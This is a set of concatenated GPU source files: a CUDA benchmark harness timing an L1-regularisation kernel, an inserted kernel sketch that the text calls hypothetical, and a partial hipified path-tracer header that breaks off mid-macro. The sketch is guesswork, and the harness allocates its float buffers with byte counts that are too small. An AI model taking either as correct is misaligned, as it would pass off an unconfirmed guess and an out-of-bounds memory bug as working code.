            cout << '[' << usecs.count() << ',' << '(' << BLOCKX << ',' << BLOCKY << ')' << ',' << '(' << XSIZE << ',' << YSIZE << ')' << ']' << endl;
        }
    }
}
43e68550dc66257b393c79b64b0e59eaedc33496.cu
#include <stdbool.h>
#include <stdio.h>
#include <string.h>
#include <getopt.h>
#include <curand_kernel.h>
#include <stdlib.h>
#include <cuda.h>
#include <sys/time.h>
#include "_l1reg.cu"
#include <chrono>
#include <iostream>
using namespace std;
using namespace std::chrono;

int blocks_[20][2] = {{8,8},{16,16},{24,24},{32,32},{1,64},{1,128},{1,192},{1,256},{1,320},{1,384},{1,448},{1,512},{1,576},{1,640},{1,704},{1,768},{1,832},{1,896},{1,960},{1,1024}};
int matrices_[7][2] = {{240,240},{496,496},{784,784},{1016,1016},{1232,1232},{1680,1680},{2024,2024}};

int main(int argc, char **argv) {
    cudaSetDevice(0);
    char* p;
    int matrix_len = strtol(argv[1], &p, 10);
    for (int matrix_looper = 0; matrix_looper < matrix_len; matrix_looper++) {
        for (int block_looper = 0; block_looper < 20; block_looper++) {
            int XSIZE = matrices_[matrix_looper][0], YSIZE = matrices_[matrix_looper][1],
                BLOCKX = blocks_[block_looper][0], BLOCKY = blocks_[block_looper][1];
            int n = XSIZE*YSIZE;
            float l1 = 1;
            float *w = NULL;
            cudaMalloc(&w, XSIZE*YSIZE);
            float *dw = NULL;
            cudaMalloc(&dw, XSIZE*YSIZE);
            int iXSIZE = XSIZE;
            int iYSIZE = YSIZE;
            while (iXSIZE % BLOCKX != 0) { iXSIZE++; }
            while (iYSIZE % BLOCKY != 0) { iYSIZE++; }
            dim3 gridBlock(iXSIZE/BLOCKX, iYSIZE/BLOCKY);
            dim3 threadBlock(BLOCKX, BLOCKY);
            cudaFree(0);
            _l1reg<<<gridBlock,threadBlock>>>(n, l1, w, dw);
            cudaDeviceSynchronize();
            for (int loop_counter = 0; loop_counter < 10; ++loop_counter) {
                _l1reg<<<gridBlock,threadBlock>>>(n, l1, w, dw);
            }
            auto start = steady_clock::now();
            for (int loop_counter = 0; loop_counter < 1000; loop_counter++) {
                _l1reg<<<gridBlock,threadBlock>>>(n, l1, w, dw);
            }
            auto end = steady_clock::now();
            auto usecs = duration_cast<duration<float, microseconds::period> >(end - start);
            cout << '[' << usecs.count() << ',' << '(' << BLOCKX << ',' << BLOCKY << ')' << ',' << '(' << XSIZE << ',' << YSIZE << ')' << ']' << endl;
        }
    }
}
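"_l1reg.cu" is likewise only brought in by #include and is not shown here; a plausible but unconfirmed reading of _l1reg(n, l1, w, dw), based only on the parameter names, is an L1 penalty gradient accumulation, sketched below.

// Hypothetical kernel body; the sign convention and the in-place accumulation
// into dw are assumptions, not taken from the original file.
__global__ void _l1reg(int n, float l1, float *w, float *dw) {
    int i = (blockIdx.y * gridDim.x + blockIdx.x) * (blockDim.x * blockDim.y)
          + threadIdx.y * blockDim.x + threadIdx.x;
    if (i < n) {
        if (w[i] > 0.0f)      dw[i] += l1;   // dw += l1 * sign(w)
        else if (w[i] < 0.0f) dw[i] -= l1;
    }
}

// The rounding loops in the harness amount to a ceil-division of the problem
// size by the block size; an equivalent launch setup would be:
//   dim3 gridBlock((XSIZE + BLOCKX - 1) / BLOCKX,
//                  (YSIZE + BLOCKY - 1) / BLOCKY);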
edeabfd7a613e9eaf6a420a69b425f51352b9c96.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include <cstdio> #include <cstdint> #include <cfloat> #include "helper_math.cu.h" /// extern "C" { /// typedef struct TreeTriangle { float vertex[3]; float edges[2][3]; float vertex_normals[3][3]; float vertex_tangents[3][4]; float vertex_uvs[3][2]; float surface_normal[3]; float inverse_area; uint32_t material_id; uint32_t pad; } TreeTriangle; /// #define TRI_VERTEX (tri_pixel) #define TRI_EDGES_0 (tri_pixel + 3) #define TRI_EDGES_1 (tri_pixel + 6) #define TRI_VN_0 (tri_pixel + 9) #define TRI_VN_1 (tri_pixel + 12) #define TRI_VN_2 (tri_pixel + 15) #define TRI_VT_0 (tri_pixel + 18) #define TRI_VT_1 (tri_pixel + 22) #define TRI_VT_2 (tri_pixel + 26) #define TRI_UV_0 (tri_pixel + 30) #define TRI_UV_1 (tri_pixel + 32) #define TRI_UV_2 (tri_pixel + 34) #define TRI_SURF_N (tri_pixel + 36) #define TRI_INV_AREA (tri_pixel + 39) #define TRI_MAT_ID (tri_pixel + 40) /// /* typedef struct FourNode { uint32_t child[4]; uint32_t extra[2]; float ll_bounds[6]; float lr_bounds[6]; float rl_bounds[6]; float rr_bounds[6]; float padding[2]; } FourNode; /// #define NODE_LL (node_pixel + 0) #define NODE_LR (node_pixel + 1) #define NODE_RL (node_pixel + 2) #define NODE_RR (node_pixel + 3) #define NODE_EXTRA_0 (node_pixel + 4) #define NODE_EXTRA_1 (node_pixel + 5) #define NODE_LL_BOUNDS (node_pixel + 6) #define NODE_LR_BOUNDS (node_pixel + 12) #define NODE_RL_BOUNDS (node_pixel + 18) #define NODE_RR_BOUNDS (node_pixel + 24) */ /// typedef struct TwoNode { uint32_t child[2]; uint32_t extra[2]; float l_bounds[6]; float r_bounds[6]; } TwoNode; /// #define NODE_L (node_pixel + 0) #define NODE_R (node_pixel + 1) #define NODE_EXTRA_0 (node_pixel + 2) #define NODE_EXTRA_1 (node_pixel + 3) #define NODE_L_BOUNDS (node_pixel + 4) #define NODE_R_BOUNDS (node_pixel + 10) /// typedef struct Camera { float aperture_size; float focal_depth; float transform[16]; float root_pixel[2]; float pixel_offset[2]; float image_plane_distance; float padding; } Camera; /// typedef struct Material { uint32_t map_flags; int32_t double_sided; float albedo[4]; float metallic; float smoothness; float glass; float emission; float albedo_bounds[4]; float normal_bounds[4]; float metallic_bounds[4]; float emission_bounds[4]; } Material; /// typedef struct Sun { float direction[4]; float sun_intensity; float sky_intensity; float color[4]; } Sun; /// typedef struct EnvironmentProperties { float intensity; float rotation; } EnvironmentProperties; /// typedef struct EmitterIndex { uint mesh_triangle_offset; uint triangle_offset; } EmitterIndex; /// typedef struct PortalIndex { uint mesh_triangle_offset; uint triangle_offset; } PortalIndex; /// typedef struct ImageProperties { int tonemap; float gamma; float exposure; float contrast; float saturation; float brightness; } ImageProperties; /// #define TREE_LEAF_TRIANGLE_FACTOR 3 /// #define HM_TEST_NODES 0x0 #define HM_LEFT 0x2 #define HM_RIGHT 0x1 #define HM_BOTH 0x3 /// #define LB_NEW_SUB_TREE 0xFFFFFFFF /// #define TREE_LEAF 0x80000000 #define TREE_LEAF_MASK 0x7FFFFFFF #define TREE_SUB_TREE 0x40000000 #define TREE_SUB_TREE_MASK 0x3FFFFFFF #define TREE_TRAIL_END 0x7FFFFFFF #define TREE_NO_LEAF_HIT 0xFFFFFFFF #define NO_TRI_HIT INT_MAX /// #define DOUBLE_SIDED_FLAG 0x80000000 #define DOUBLE_SIDED_MASK 0x7FFFFFFF /// #define THROUGHPUT_THRESHOLD 0.05f /// #define DIRAC_PDF FLT_MAX /// #define MAP_FLAG_ALBEDO 0x1 #define MAP_FLAG_NORMAL 0x2 #define MAP_FLAG_METALLIC 0x4 #define MAP_FLAG_EMISSION 0x8 /// #define 
SUN_COS_THETA 0.9996f /// #define STATE_ENVIRONMENT 0x0 #define STATE_EMISSIVE 0x1 #define STATE_MATERIAL 0x2 #define STATE_SECONDARY 0x3 #define STATE_END 0x4 /// #define RS_STATE (ray_count * 0 + global_id) #define RS_ORIGIN_X (ray_count * 1 + global_id) #define RS_ORIGIN_Y (ray_count * 2 + global_id) #define RS_ORIGIN_Z (ray_count * 3 + global_id) #define RS_DIR_X (ray_count * 4 + global_id) #define RS_DIR_Y (ray_count * 5 + global_id) #define RS_DIR_Z (ray_count * 6 + global_id) #define RS_U (ray_count * 7 + global_id) #define RS_V (ray_count * 8 + global_id) #define RS_HIT_DISTANCE (ray_count * 9 + global_id) #define RS_TRI_INDEX (ray_count * 10 + global_id) #define RS_LAST_BRDF_PDF (ray_count * 11 + global_id) #define RS_THROUGHPUT_R (ray_count * 12 + global_id) #define RS_THROUGHPUT_G (ray_count * 13 + global_id) #define RS_THROUGHPUT_B (ray_count * 14 + global_id) #define RS_COLOR_R (ray_count * 15 + global_id) #define RS_COLOR_G (ray_count * 16 + global_id) #define RS_COLOR_B (ray_count * 17 + global_id) #define RS_SUN_D_X (ray_count * 18 + global_id) #define RS_SUN_D_Y (ray_count * 19 + global_id) #define RS_SUN_D_Z (ray_count * 20 + global_id) #define RS_SUN_R (ray_count * 21 + global_id) #define RS_SUN_G (ray_count * 22 + global_id) #define RS_SUN_B (ray_count * 23 + global_id) #define RS_EMITTER_D_X (ray_count * 24 + global_id) #define RS_EMITTER_D_Y (ray_count * 25 + global_id) #define RS_EMITTER_D_Z (ray_count * 26 + global_id) #define RS_EMITTER_T (ray_count * 27 + global_id) #define RS_EMITTER_R (ray_count * 28 + global_id) #define RS_EMITTER_G (ray_count * 29 + global_id) #define RS_EMITTER_B (ray_count * 30 + global_id) #define RS_PORTAL_D_X (ray_count * 31 + global_id) #define RS_PORTAL_D_Y (ray_count * 32 + global_id) #define RS_PORTAL_D_Z (ray_count * 33 + global_id) #define RS_PORTAL_R (ray_count * 34 + global_id) #define RS_PORTAL_G (ray_count * 35 + global_id) #define RS_PORTAL_B (ray_count * 36 + global_id) /// #define GET_GLOBAL_ID() \ ((blockIdx.y * gridDim.x + blockIdx.x) * \ (blockDim.x * blockDim.y) + \ (threadIdx.y * blockDim.x + threadIdx.x)) /// #define HI_EPSILON 0.01f #define EPSILON 0.0001f #define LO_EPSILON 0.000001f #define PI 3.14159265359f #define INV_PI 0.31830988618f #define TAU 6.28318530718f #define INV_TAU 0.15915494309 /// #define PRNG(P, SEED, R) \ { \ uint hash = SEED; \ hash ^= P; \ hash += (hash << 10); \ hash ^= (hash >> 6); \ hash += (hash << 3); \ hash ^= (hash >> 11); \ hash += (hash << 15); \ hash ^= hash >> 16; \ hash *= 0x85EBCA6B; \ hash ^= hash >> 13; \ hash *= 0xC2B2AE35; \ hash ^= hash >> 16; \ hash &= 0x007FFFFFu; \ hash |= 0x3F800000u; \ R = *((float*)&hash) - 1.0f; \ R = fmax(EPSILON, R); \ } /// #define TRANSFORM_X(P, MAT, R) { \ R[0] = P[0] * MAT[0] + P[1] * MAT[4] + P[2] * MAT[8] + MAT[12]; \ } #define TRANSFORM_Y(P, MAT, R) { \ R[1] = P[0] * MAT[1] + P[1] * MAT[5] + P[2] * MAT[9] + MAT[13]; \ } #define TRANSFORM_Z(P, MAT, R) { \ R[2] = P[0] * MAT[2] + P[1] * MAT[6] + P[2] * MAT[10] + MAT[14]; \ } #define TRANSFORM_W(P, MAT, R) { \ R[3] = P[0] * MAT[3] + P[1] * MAT[7] + P[2] * MAT[11] + MAT[15]; \ } /// #define DOT(A, B) (A[0] * B[0] + A[1] * B[1] + A[2] * B[2]) /// #define CROSS(A, B, C) { \ C[0] = A[1] * B[2] - A[2] * B[1]; \ C[1] = A[2] * B[0] - A[0] * B[2]; \ C[2] = A[0] * B[1] - A[1] * B[0]; \ } /// #define NOT_ZERO(A) copysignf(fmax(LO_EPSILON, fabs(A)), (A)) /// #define NORMALIZE(V) \ { \ float length = sqrt(V[0] * V[0] + V[1] * V[1] + V[2] * V[2]); \ float inv_length = 1.0f / NOT_ZERO(length); \ V[0] *= 
inv_length; \ V[1] *= inv_length; \ V[2] *= inv_length; \ } /// #define GGX_SAMPLE(D_I, ROUGHNESS, RXF, RYF, N) \ { \ float stretched[3]; \ stretched[0] = ROUGHNESS[0] * D_I[0]; \ stretched[1] = ROUGHNESS[1] * D_I[1]; \ stretched[2] = D_I[2]; \ NORMALIZE(stretched); \ float up[3]; \ up[0] = 0.0f; \ up[1] = 0.0f; \ up[2] = 1.0f; \ float t1[3]; \ CROSS(stretched, up, t1); \ if (stretched[2] < 0.9999f) { \ NORMALIZE(t1); \ } else { \ t1[0] = 1.0f; \ t1[1] = 0.0f; \ t1[2] = 0.0f; \ } \ float t2[3]; \ CROSS(t1, stretched, t2); \ float a = 1.0f / (1.0f + stretched[2]); \ float r = sqrt(RXF); \ float phi = (RYF < a) ? RYF / a * PI : PI + (RYF - a) / (1.0f - a) * PI; \ float p1 = r * cos(phi); \ float p2 = r * sin(phi) * ((RYF < a) ? 1.0f : stretched[2]); \ N[0] = ROUGHNESS[0] * \ (p1 * t1[0] + p2 * t2[0] + sqrt(1.0f - p1 * p1 - p2 * p2) * stretched[0]); \ N[1] = ROUGHNESS[1] * \ (p1 * t1[1] + p2 * t2[1] + sqrt(1.0f - p1 * p1 - p2 * p2) * stretched[1]); \ N[2] = (p1 * t1[2] + p2 * t2[2] + sqrt(1.0f - p1 * p1 - p2 * p2) * stretched[2]); \ NORMALIZE(N); \ } /// #define TAN_THETA(V, T) \ { \ float temp = 1.0f - V[2] * V[2]; \ if (temp <= 0.0f) { \ T = 0.0f; \ } else { \ T = sqrt(temp) / V[2]; \ } \ } /// #define SIN_THETA_2(V, T) \ { \ T = 1.0f - V[2] * V[2]; \ } /// #define PROJECT_ROUGHNESS(V, ROUGHNESS, R) \ { \ float sin_theta_2; \ SIN_THETA_2(V, sin_theta_2); \ float inv_sin_theta_2 = 1.0f / sin_theta_2; \ if ((ROUGHNESS[0] == ROUGHNESS[1]) || (inv_sin_theta_2 <= 0.0f)) { \ R = ROUGHNESS[0]; \ } else { \ float cos_phi_2 = V[0] * V[0] * inv_sin_theta_2; \ float sin_phi_2 = V[1] * V[1] * inv_sin_theta_2; \ R = sqrt(cos_phi_2 * ROUGHNESS[0] * ROUGHNESS[0] + \ sin_phi_2 * ROUGHNESS[1] * ROUGHNESS[1]); \ } \ } /// #define HYPOT_2(A, B, R) \ { \ if (fabs(A) > fabs(B)) { \ R = B / A; \ R = fabs(A) * sqrt(1.0f + R * R); \ } else if (B != 0.0f) { \ R = A / B; \ R = fabs(B) * sqrt(1.0f + R * R); \ } else {\ R = 0.0f; \ } \ } /// #define SMITH_G1(V, N, ROUGHNESS, G1) \ { \ if ((DOT(N, V) * V[2]) <= 0.0f) { \ G1 = 0.0f; \ } else { \ float tan_theta; \ TAN_THETA(V, tan_theta); \ tan_theta = fabs(tan_theta); \ if (tan_theta == 0.0f) { \ G1 = 1.0f; \ } else { \ float alpha; \ PROJECT_ROUGHNESS(V, ROUGHNESS, alpha); \ float root = alpha * tan_theta; \ float hypot_2; \ HYPOT_2(1.0f, root, hypot_2); \ G1 = 2.0f / (1.0f + hypot_2); \ } \ } \ } /// #define GGX_EVAL(N, ROUGHNESS, R) \ { \ if (N[2] <= 0.0f) { \ R = 0.0f; \ } else { \ float cos_theta_2 = N[2] * N[2]; \ float exponent = ((N[0] * N[0]) / (ROUGHNESS[0] * ROUGHNESS[0]) + \ (N[1] * N[1]) / (ROUGHNESS[1] * ROUGHNESS[1])) / cos_theta_2; \ float root = (1.0f + exponent) * cos_theta_2; \ R = 1.0f / (PI * ROUGHNESS[0] * ROUGHNESS[1] * root * root); \ } \ } /// #define AVG_TONEMAP(RGB) \ { \ RGB[0] *= inv_sample_count; \ RGB[1] *= inv_sample_count; \ RGB[2] *= inv_sample_count; \ RGB[0] *= image_properties.exposure + 2.0f; \ RGB[1] *= image_properties.exposure + 2.0f; \ RGB[2] *= image_properties.exposure + 2.0f; \ if (image_properties.tonemap) { \ RGB[0] = ((RGB[0] * (0.15f * RGB[0] + 0.10f * 0.5f) + 0.20f * 0.02f) / \ (RGB[0] * (0.15f * RGB[0] + 0.5f) + 0.2f * 0.3f)) - (0.02f / 0.3f); \ RGB[1] = ((RGB[1] * (0.15f * RGB[1] + 0.10f * 0.5f) + 0.20f * 0.02f) / \ (RGB[1] * (0.15f * RGB[1] + 0.5f) + 0.2f * 0.3f)) - (0.02f / 0.3f); \ RGB[2] = ((RGB[2] * (0.15f * RGB[2] + 0.10f * 0.5f) + 0.20f * 0.02f) / \ (RGB[2] * (0.15f * RGB[2] + 0.5f) + 0.2f * 0.3f)) - (0.02f / 0.3f); \ float whitescale = 11.2f; \ whitescale = ((whitescale * (0.15f * whitescale + 0.10f * 0.5f) + 
\ 0.20f * 0.02f) / (whitescale * (0.15f * whitescale + 0.5f) + \ 0.2f * 0.3f)) - (0.02f / 0.3f); \ whitescale = 1.0f / whitescale; \ RGB[0] *= whitescale; \ RGB[1] *= whitescale; \ RGB[2] *= whitescale; \ } \ RGB[0] = pow(RGB[0], 1.0f / image_properties.gamma); \ RGB[1] = pow(RGB[1], 1.0f / image_properties.gamma); \ RGB[2] = pow(RGB[2], 1.0f / image_properties.gamma); \ } /// #define MIS(A, B) ((A * A) / (A * A + B * B)) /// #define CONCENTRIC_HEMI(R0, R1, D) \ { \ R0 = 2.0f * R0 - 1.0f; \ R1 = 2.0f * R1 - 1.0f; \ float phi, r; \ if (R0 == 0.0f && R1 == 0.0f) { \ r = phi = 0.0f; \ } else if ((R0 * R0) > (R1 * R1)) { \ r = R0; \ phi = (PI * 0.25f) * (R1 / (R0)); \ } else { \ r = R1; \ phi = (PI * 0.5f) - (R0 / (R1)) * (PI * 0.25f); \ } \ float cos_phi = cos(phi); \ float sin_phi = sin(phi); \ D[0] = r * cos_phi; \ D[1] = r * sin_phi; \ D[2] = sqrt(fmax(0.0f, 1.0f - D[0] * D[0] - D[1] * D[1])); \ NORMALIZE(D); \ } /// #define GET_BASIS(N, T, B) \ {\ float z = 1.0f + N[2]; \ float a = 1.0f / NOT_ZERO(z); \ float b = -N[0] * N[1] * a; \ T[0] = 1.0f - N[0] * N[0] * a; \ T[1] = b; \ T[2] = -N[0]; \ B[0] = b; \ B[1] = 1.0f - N[1] * N[1] * a; \ B[2] = -N[1]; \ } /// #define GET_VT_BASIS(N, T, B) \ {\ float flip_binormal; \ if (use_triangles_image) { \ T[0] = w * tex1Dfetch<float>(triangles_image, TRI_VT_0) + \ u * tex1Dfetch<float>(triangles_image, TRI_VT_1) + \ v * tex1Dfetch<float>(triangles_image, TRI_VT_2); \ T[1] = w * tex1Dfetch<float>(triangles_image, TRI_VT_0 + 1) + \ u * tex1Dfetch<float>(triangles_image, TRI_VT_1 + 1) + \ v * tex1Dfetch<float>(triangles_image, TRI_VT_2 + 1); \ T[2] = w * tex1Dfetch<float>(triangles_image, TRI_VT_0 + 2) + \ u * tex1Dfetch<float>(triangles_image, TRI_VT_1 + 2) + \ v * tex1Dfetch<float>(triangles_image, TRI_VT_2 + 2); \ flip_binormal = w * tex1Dfetch<float>(triangles_image, TRI_VT_0 + 3) + \ u * tex1Dfetch<float>(triangles_image, TRI_VT_1 + 3) + \ v * tex1Dfetch<float>(triangles_image, TRI_VT_2 + 3); \ } else { \ T[0] = w * triangles[tri_index].vertex_tangents[0][0] + \ u * triangles[tri_index].vertex_tangents[1][0] + \ v * triangles[tri_index].vertex_tangents[2][0]; \ T[1] = w * triangles[tri_index].vertex_tangents[0][1] + \ u * triangles[tri_index].vertex_tangents[1][1] + \ v * triangles[tri_index].vertex_tangents[2][1]; \ T[2] = w * triangles[tri_index].vertex_tangents[0][2] + \ u * triangles[tri_index].vertex_tangents[1][2] + \ v * triangles[tri_index].vertex_tangents[2][2]; \ flip_binormal = w * triangles[tri_index].vertex_tangents[0][3] + \ u * triangles[tri_index].vertex_tangents[1][3] + \ v * triangles[tri_index].vertex_tangents[2][3]; \ } \ CROSS(N, T, B); \ if (flip_binormal < 0.0f) { \ B[0] = -B[0]; \ B[1] = -B[1]; \ B[2] = -B[2]; \ } \ } /// #define RELATIVE_TO_BASIS(V, N, T, B, D) \ {\ D[0] = DOT(V, T); \ D[1] = DOT(V, B); \ D[2] = DOT(V, N); \ } /// #define ROTATE_TO_BASIS(V, N, T, B, D) \ {\ D[0] = V[0] * T[0] + V[1] * B[0] + V[2] * N[0]; \ D[1] = V[0] * T[1] + V[1] * B[1] + V[2] * N[1]; \ D[2] = V[0] * T[2] + V[1] * B[2] + V[2] * N[2]; \ } /// #define CONDUCTOR_FRESNEL(I, IOR, K, F) \ { \ float cos_theta_2 = I * I; \ float temp = (IOR * IOR + K * K) * cos_theta_2; \ float rp2 = (temp - (IOR * (2.0f * I)) + 1.0f) / \ (temp + (IOR * (2.0f * I)) + 1.0f); \ float tempf = IOR * IOR + K * K; \ float rs2 = (tempf - (IOR * (2.0f * I)) + cos_theta_2) / \ (tempf + (IOR * (2.0f * I)) + cos_theta_2); \ F = 0.5f * (rp2 + rs2); \ } /// #define DIELECTRIC_FRESNEL(I, IOR, COS_THETA_T, F) \ { \ float scale = (I > 0.0f) ? 
1.0f / IOR : IOR; \ float cos_theta_t2 = 1.0f - (1.0f - I * I) * (scale * scale); \ if (cos_theta_t2 < 0.0f) { \ COS_THETA_T = 0.0f; \ F = 1.0f; \ } else { \ float cos_theta_i = fabs(I); \ float _cos_theta_t = sqrt(cos_theta_t2); \ float rs = (cos_theta_i - IOR * _cos_theta_t) / \ (cos_theta_i + IOR * _cos_theta_t); \ float rp = (IOR * cos_theta_i - _cos_theta_t) / \ (IOR * cos_theta_i + _cos_theta_t); \ COS_THETA_T = (I > 0.0f) ? -_cos_theta_t : _cos_theta_t; \ F = 0.5f * (rs * rs + rp * rp); \ } \ } /// #define TRACE(USE_NODES_IMAGE, USE_TRIANGLES_IMAGE, PRIMARY_RAY) \ { \ float id[3], ood[3]; \ id[0] = 1.0f / NOT_ZERO(d[0]); \ id[1] = 1.0f / NOT_ZERO(d[1]); \ id[2] = 1.0f / NOT_ZERO(d[2]); \ ood[0] = o[0] * id[0]; \ ood[1] = o[1] * id[1]; \ ood[2] = o[2] * id[2]; \ int32_t h_tri_index = NO_TRI_HIT; \ int32_t h_material_type; \ float h_u, h_v; \ float h_t = FLT_MAX; \ uint32_t top_tree_height; \ if (USE_NODES_IMAGE) { \ uint32_t node_pixel = (top_tree_offset << 4); \ top_tree_height = tex1Dfetch<uint32_t>(nodes_image, \ NODE_EXTRA_0); \ } else { \ top_tree_height = nodes[top_tree_offset].extra[0]; \ } \ uint32_t tree_height = top_tree_height; \ uint32_t tree_offset = top_tree_offset; \ uint32_t node_offset = 0; \ uint32_t trail = 0x0; \ uint32_t key = 0x0; \ uint32_t level_bit = 0x1 << (top_tree_height - 1); \ uint32_t hit_leaf = TREE_NO_LEAF_HIT; \ uint32_t mesh_triangle_offset = 0; \ uint32_t hit_mask = HM_TEST_NODES; \ while (true) { \ while (hit_leaf >= TREE_NO_LEAF_HIT) { \ uint32_t node_index = node_offset + tree_offset; \ uint32_t node_pixel = (node_index << 4); \ if (level_bit == LB_NEW_SUB_TREE) { \ if (USE_NODES_IMAGE) { \ tree_height = tex1Dfetch<uint32_t>(nodes_image, \ NODE_EXTRA_0); \ mesh_triangle_offset = tex1Dfetch<uint32_t>(nodes_image, \ NODE_EXTRA_1); \ } else { \ tree_height = nodes[node_index].extra[0]; \ mesh_triangle_offset = nodes[node_index].extra[1]; \ } \ trail <<= tree_height; \ key <<= tree_height; \ level_bit = 0x1 << (tree_height - 1); \ } \ if (hit_mask == HM_TEST_NODES) { \ float l_bounds[6], r_bounds[6]; \ if (USE_NODES_IMAGE) { \ l_bounds[0] = tex1Dfetch<float>(nodes_image, NODE_L_BOUNDS); \ l_bounds[1] = tex1Dfetch<float>(nodes_image, NODE_L_BOUNDS + 1); \ l_bounds[2] = tex1Dfetch<float>(nodes_image, NODE_L_BOUNDS + 2); \ l_bounds[3] = tex1Dfetch<float>(nodes_image, NODE_L_BOUNDS + 3); \ l_bounds[4] = tex1Dfetch<float>(nodes_image, NODE_L_BOUNDS + 4); \ l_bounds[5] = tex1Dfetch<float>(nodes_image, NODE_L_BOUNDS + 5); \ r_bounds[0] = tex1Dfetch<float>(nodes_image, NODE_R_BOUNDS); \ r_bounds[1] = tex1Dfetch<float>(nodes_image, NODE_R_BOUNDS + 1); \ r_bounds[2] = tex1Dfetch<float>(nodes_image, NODE_R_BOUNDS + 2); \ r_bounds[3] = tex1Dfetch<float>(nodes_image, NODE_R_BOUNDS + 3); \ r_bounds[4] = tex1Dfetch<float>(nodes_image, NODE_R_BOUNDS + 4); \ r_bounds[5] = tex1Dfetch<float>(nodes_image, NODE_R_BOUNDS + 5); \ } else { \ l_bounds[0] = nodes[node_index].l_bounds[0]; \ l_bounds[1] = nodes[node_index].l_bounds[1]; \ l_bounds[2] = nodes[node_index].l_bounds[2]; \ l_bounds[3] = nodes[node_index].l_bounds[3]; \ l_bounds[4] = nodes[node_index].l_bounds[4]; \ l_bounds[5] = nodes[node_index].l_bounds[5]; \ r_bounds[0] = nodes[node_index].r_bounds[0]; \ r_bounds[1] = nodes[node_index].r_bounds[1]; \ r_bounds[2] = nodes[node_index].r_bounds[2]; \ r_bounds[3] = nodes[node_index].r_bounds[3]; \ r_bounds[4] = nodes[node_index].r_bounds[4]; \ r_bounds[5] = nodes[node_index].r_bounds[5]; \ } \ float l_lo[3], l_hi[3]; \ l_lo[0] = l_bounds[0] * id[0] - ood[0]; \ l_lo[1] 
= l_bounds[1] * id[1] - ood[1]; \ l_lo[2] = l_bounds[2] * id[2] - ood[2]; \ l_hi[0] = l_bounds[3] * id[0] - ood[0]; \ l_hi[1] = l_bounds[4] * id[1] - ood[1]; \ l_hi[2] = l_bounds[5] * id[2] - ood[2]; \ float r_lo[3], r_hi[3]; \ r_lo[0] = r_bounds[0] * id[0] - ood[0]; \ r_lo[1] = r_bounds[1] * id[1] - ood[1]; \ r_lo[2] = r_bounds[2] * id[2] - ood[2]; \ r_hi[0] = r_bounds[3] * id[0] - ood[0]; \ r_hi[1] = r_bounds[4] * id[1] - ood[1]; \ r_hi[2] = r_bounds[5] * id[2] - ood[2]; \ float l_near = fmax(fmax(fmax(fmin(l_lo[0], l_hi[0]),\ fmin(l_lo[1], l_hi[1])),\ fmin(l_lo[2], l_hi[2])), 0.0f); \ float l_far = fmin(fmin(fmax(l_lo[0], l_hi[0]),\ fmax(l_lo[1], l_hi[1])),\ fmax(l_lo[2], l_hi[2])); \ float r_near = fmax(fmax(fmax(fmin(r_lo[0], r_hi[0]),\ fmin(r_lo[1], r_hi[1])),\ fmin(r_lo[2], r_hi[2])), 0.0f); \ float r_far = fmin(fmin(fmax(r_lo[0], r_hi[0]),\ fmax(r_lo[1], r_hi[1])),\ fmax(r_lo[2], r_hi[2])); \ hit_mask = (((l_far >= l_near) && (l_near < h_t)) << 1) | \ ((r_far >= r_near) && (r_near < h_t)); \ if (hit_mask == HM_BOTH) { \ hit_mask = (l_near < r_near) + 1; \ trail |= level_bit; \ } \ } \ if (hit_mask == HM_TEST_NODES) { \ break; \ } \ if (hit_mask == HM_RIGHT) { \ key |= level_bit; \ node_offset += level_bit; \ } else { \ ++node_offset; \ } \ uint child = (hit_mask & 0x1); \ if (USE_NODES_IMAGE) { \ child = tex1Dfetch<uint32_t>(nodes_image, NODE_L + child); \ } else { \ child = nodes[node_index].child[child]; \ } \ hit_mask = HM_TEST_NODES; \ level_bit >>= 1; \ if (child & TREE_LEAF) { \ hit_leaf = (child & TREE_LEAF_MASK); \ break; \ } else if (child & TREE_SUB_TREE) { \ tree_offset = (child & TREE_SUB_TREE_MASK); \ level_bit = LB_NEW_SUB_TREE; \ node_offset = 0; \ } \ } \ if (hit_leaf != TREE_NO_LEAF_HIT) { \ uint tri_count = (hit_leaf >> (31 - TREE_LEAF_TRIANGLE_FACTOR)); \ uint tri_offset = mesh_triangle_offset + \ (hit_leaf & \ (TREE_LEAF_MASK >> TREE_LEAF_TRIANGLE_FACTOR)); \ for (uint32_t ti = tri_offset; ti <= tri_offset + tri_count; ++ti) { \ uint32_t tri_pixel = ti * 42; \ float vertex[3]; \ float edges[2][3]; \ float surface_normal[3]; \ if (USE_TRIANGLES_IMAGE) { \ vertex[0] = tex1Dfetch<float>(triangles_image, TRI_VERTEX); \ vertex[1] = tex1Dfetch<float>(triangles_image, TRI_VERTEX + 1); \ vertex[2] = tex1Dfetch<float>(triangles_image, TRI_VERTEX + 2); \ edges[0][0] = tex1Dfetch<float>(triangles_image, TRI_EDGES_0); \ edges[0][1] = tex1Dfetch<float>(triangles_image, TRI_EDGES_0 + 1); \ edges[0][2] = tex1Dfetch<float>(triangles_image, TRI_EDGES_0 + 2); \ edges[1][0] = tex1Dfetch<float>(triangles_image, TRI_EDGES_1); \ edges[1][1] = tex1Dfetch<float>(triangles_image, TRI_EDGES_1 + 1); \ edges[1][2] = tex1Dfetch<float>(triangles_image, TRI_EDGES_1 + 2); \ surface_normal[0] = tex1Dfetch<float>(triangles_image, \ TRI_SURF_N); \ surface_normal[1] = tex1Dfetch<float>(triangles_image, \ TRI_SURF_N + 1); \ surface_normal[2] = tex1Dfetch<float>(triangles_image, \ TRI_SURF_N + 2); \ } else { \ vertex[0] = triangles[ti].vertex[0]; \ vertex[1] = triangles[ti].vertex[1]; \ vertex[2] = triangles[ti].vertex[2]; \ edges[0][0] = triangles[ti].edges[0][0]; \ edges[0][1] = triangles[ti].edges[0][1]; \ edges[0][2] = triangles[ti].edges[0][2]; \ edges[1][0] = triangles[ti].edges[1][0]; \ edges[1][1] = triangles[ti].edges[1][1]; \ edges[1][2] = triangles[ti].edges[1][2]; \ surface_normal[0] = triangles[ti].surface_normal[0]; \ surface_normal[1] = triangles[ti].surface_normal[1]; \ surface_normal[2] = triangles[ti].surface_normal[2]; \ } \ float c[3], r[3]; \ c[0] = vertex[0] - o[0]; \ c[1] = 
